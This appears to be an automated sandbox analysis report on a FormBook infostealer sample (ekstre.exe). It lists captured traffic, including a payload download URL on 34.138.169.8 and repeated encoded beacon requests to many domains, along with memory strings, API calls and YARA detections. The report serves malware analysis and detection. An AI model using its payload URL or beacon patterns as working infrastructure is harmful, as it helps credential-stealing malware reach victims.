Source: global traffic	HTTP traffic detected: GET /mi94/?iN64=mO3gULgzVK9RKFx+HvnjTN/7ulsiA608FnchGSf2u+Dat8/14sLz5+BvjwL16EDGrJ0d&7ncHc8=Tv6lQt-XnpBl3ra HTTP/1.1Host: www.bestpetfinds.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?iN64=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&7ncHc8=Tv6lQt-XnpBl3ra HTTP/1.1Host: www.credit-cards-54889.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?iN64=1+ICr/6rV9rD5T+b2fkS8puQwviKUFcipOdxmxkdKen6Mbo7iu+c87PDf8Q8GUw5BiYT&7ncHc8=Tv6lQt-XnpBl3ra HTTP/1.1Host: www.realdigitalmarketing.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?7ncHc8=Tv6lQt-XnpBl3ra&iN64=oUKF/a0VBYM/wUiPoEbZf2Cmkmjvp/vv1ZeFcEWnUAPVfAMIxMINRx/0nluyfFKvqa1+ HTTP/1.1Host: www.laxmi.digitalConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?7ncHc8=Tv6lQt-XnpBl3ra&iN64=DPf7iOV4tZbGC7wAZwygpODOxt/Orl+HPYO0G2nQwomd4kRyfSlRFlrSB1ttg/LMfS7c HTTP/1.1Host: www.hunterboots--canada.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?iN64=yWvflPZmA6sDTRnU+9mPZ73OUYs40Kr339wYW1rax9u/9VBDQLHJ+4R0Ww036kIARE0W&7ncHc8=Tv6lQt-XnpBl3ra HTTP/1.1Host: www.cursosweb22.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?7ncHc8=Tv6lQt-XnpBl3ra&iN64=GzonJysSCxRGkwuMNYAbGaaQ0mJlLDwvvbsPrzKkAvYoJl+ajLQ6kQQMPxWrYSJRg4EW HTTP/1.1Host: www.iltuosentiero.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?iN64=ucLR8l4OnnzTTT+Cl0iGjLwYehJgmVWcPF1J5boC9Slql7vaJu9GnsPK80Xp04+ZInVR&7ncHc8=Tv6lQt-XnpBl3ra HTTP/1.1Host: www.6880365.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?iN64=ORIqx8IF1+X+2hN52P87hXte5s/HoBMDp1q1F2AtNmI3dmVw+3KXXOfhBFQ6DTUSnU2z&7ncHc8=Tv6lQt-XnpBl3ra HTTP/1.1Host: www.edelman-production.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?iN64=yKcY3jotfSPLyB/ftSMp74iudURdb3SAsX12brKJ4aUNBvL8L7J7V3FDmQx4l6kHWp2H&4hKt-j=ZVzPwN HTTP/1.1Host: www.anotherworldrecord.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?7ncHc8=Tv6lQt-XnpBl3ra&iN64=QL/B8MzEY0HNvMy3VPGhV3P43kBHTcVAQ0SbOcVGS/U14nEiro/6l5lW3aX+iQqKLRyM HTTP/1.1Host: www.luivix.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 213.186.33.5 213.186.33.5

Source: global traffic

HTTP traffic detected: GET /wp-content/themes/seotheme/RenHLfAoTIbu98.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 34.138.169.8Cache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 30 Mar 2023 12:22:17 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 Mar 2023 12:24:00 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheSet-Cookie: zenid=6f8kl1kif9jlolshvdsra7dpb3; path=/; domain=.www.hunterboots--canada.com; secure; HttpOnlyUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 31 65 63 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 45 4a 77 49 4e 4b 39 48 47 50 37 62 72 41 6a 46 55 75 75 79 34 6c 62 6c 44 62 73 45 47 75 7a 55 47 62 63 47 6e 64 74 68 32 63 59 22 20 2f 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 3a 20 48 75 6e 74 65 72 20 42 6f 6f 74 73 20 43 61 6e 61 64 61 20 2d 20 53 68 6f 70 20 52 61 69 6e 62 6f 6f 74 73 20 57 69 74 68 20 46 72 65 65 20 53 68 69 70 70 69 6e 67 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 20 0d 0a 0d 0a 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 6d 65 6e 20 4d 65 6e 20 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 48 75 6e 74 65 72 20 42 6f 6f 74 73 20 43 61 6e 61 64 61 20 2d 20 53 68 6f 70 20 52 61 69 6e 62 6f 6f 74 73 20 57 69 74 68 20 46 72 65 65 20 53 68 69 70 70 69 6e 67 20 3a 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 57 6f 6d 65 6e 20 4d 65 6e 20 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 69 6d 61 67 65 74 6f 6f 6c 62 61 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 22 20 2f 3e 0d 0a 0d 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 75 Data Ascii: 1ec1<!DOCTYPE html PUBLIC "-//W3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Thu, 30 Mar 2023 12:24:41 GMTConnection: closeContent-Length: 5057Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 30 Mar 2023 12:25:02 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 Mar 2023 12:27:24 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 75 69 76 69 78 2e 6f 6e 6c 69 6e 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.luivix.online Port 80</address></body></html>

Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8

Source: ekstre.exe, 00000002.00000003.1167675585.000000000691D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.138.169.8/
Source: ekstre.exe, 00000002.00000002.1368334017.00000000068C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin
Source: ekstre.exe	String found in binary or memory: http://go.micr
Source: ekstre.exe, 00000002.00000001.1058237415.0000000000649000.00000008.00000001.01000000.00000007.sdmp	String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: ekstre.exe, 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ekstre.exe, 00000000.00000000.788954408.000000000040A000.00000008.00000001.01000000.00000003.sdmp, ekstre.exe, 00000002.00000000.1056701304.000000000040A000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: ekstre.exe, 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmp, ekstre.exe, 00000000.00000002.1225423801.0000000002B81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/
Source: ekstre.exe, 00000002.00000001.1058237415.0000000000649000.00000008.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.gopher.ftp://ftp.
Source: ekstre.exe, 00000002.00000001.1058237415.0000000000626000.00000008.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: ekstre.exe, 00000002.00000001.1058237415.00000000005F2000.00000008.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: ekstre.exe, 00000002.00000001.1058237415.00000000005F2000.00000008.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: ekstre.exe	String found in binary or memory: https://go.mic
Source: ekstre.exe	String found in binary or memory: https://go.microso
Source: ekstre.exe, 00000002.00000001.1058237415.0000000000649000.00000008.00000001.01000000.00000007.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214

Source: unknown

DNS traffic detected: queries for: www.leqidt.tax

Source: C:\Windows\explorer.exe

Code function: 3_2_0A7D5F82 getaddrinfo,SleepEx,setsockopt,recv,recv,

3_2_0A7D5F82

Source: global traffic	HTTP traffic detected: GET /wp-content/themes/seotheme/RenHLfAoTIbu98.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 34.138.169.8Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mi94/?7ncHc8=Tv6lQt-XnpBl3ra&iN64=CmkHYlvtWFyiY6x7wzgggV7o1XWqH1EIkW2vDHN+0HbYWyx2WNdLHwPWYAq7GV6cOSXz HTTP/1.1Host: www.crosswalkconsulting.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?iN64=mO3gULgzVK9RKFx+HvnjTN/7ulsiA608FnchGSf2u+Dat8/14sLz5+BvjwL16EDGrJ0d&7ncHc8=Tv6lQt-XnpBl3ra HTTP/1.1Host: www.bestpetfinds.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?iN64=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&7ncHc8=Tv6lQt-XnpBl3ra HTTP/1.1Host: www.credit-cards-54889.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?iN64=1+ICr/6rV9rD5T+b2fkS8puQwviKUFcipOdxmxkdKen6Mbo7iu+c87PDf8Q8GUw5BiYT&7ncHc8=Tv6lQt-XnpBl3ra HTTP/1.1Host: www.realdigitalmarketing.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?7ncHc8=Tv6lQt-XnpBl3ra&iN64=oUKF/a0VBYM/wUiPoEbZf2Cmkmjvp/vv1ZeFcEWnUAPVfAMIxMINRx/0nluyfFKvqa1+ HTTP/1.1Host: www.laxmi.digitalConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?7ncHc8=Tv6lQt-XnpBl3ra&iN64=DPf7iOV4tZbGC7wAZwygpODOxt/Orl+HPYO0G2nQwomd4kRyfSlRFlrSB1ttg/LMfS7c HTTP/1.1Host: www.hunterboots--canada.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?iN64=yWvflPZmA6sDTRnU+9mPZ73OUYs40Kr339wYW1rax9u/9VBDQLHJ+4R0Ww036kIARE0W&7ncHc8=Tv6lQt-XnpBl3ra HTTP/1.1Host: www.cursosweb22.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?7ncHc8=Tv6lQt-XnpBl3ra&iN64=GzonJysSCxRGkwuMNYAbGaaQ0mJlLDwvvbsPrzKkAvYoJl+ajLQ6kQQMPxWrYSJRg4EW HTTP/1.1Host: www.iltuosentiero.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?iN64=ucLR8l4OnnzTTT+Cl0iGjLwYehJgmVWcPF1J5boC9Slql7vaJu9GnsPK80Xp04+ZInVR&7ncHc8=Tv6lQt-XnpBl3ra HTTP/1.1Host: www.6880365.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?iN64=ORIqx8IF1+X+2hN52P87hXte5s/HoBMDp1q1F2AtNmI3dmVw+3KXXOfhBFQ6DTUSnU2z&7ncHc8=Tv6lQt-XnpBl3ra HTTP/1.1Host: www.edelman-production.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?iN64=yKcY3jotfSPLyB/ftSMp74iudURdb3SAsX12brKJ4aUNBvL8L7J7V3FDmQx4l6kHWp2H&4hKt-j=ZVzPwN HTTP/1.1Host: www.anotherworldrecord.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?7ncHc8=Tv6lQt-XnpBl3ra&iN64=QL/B8MzEY0HNvMy3VPGhV3P43kBHTcVAQ0SbOcVGS/U14nEiro/6l5lW3aX+iQqKLRyM HTTP/1.1Host: www.luivix.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: C:\Users\user\Desktop\ekstre.exe

Code function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405809

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 4.2.control.exe.2f2b960.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1382219110.00000000367E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1255579252.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.5836342798.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.5837726512.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.control.exe.2f2b960.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.control.exe.2f2b960.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.control.exe.2f2b960.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1382219110.00000000367E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
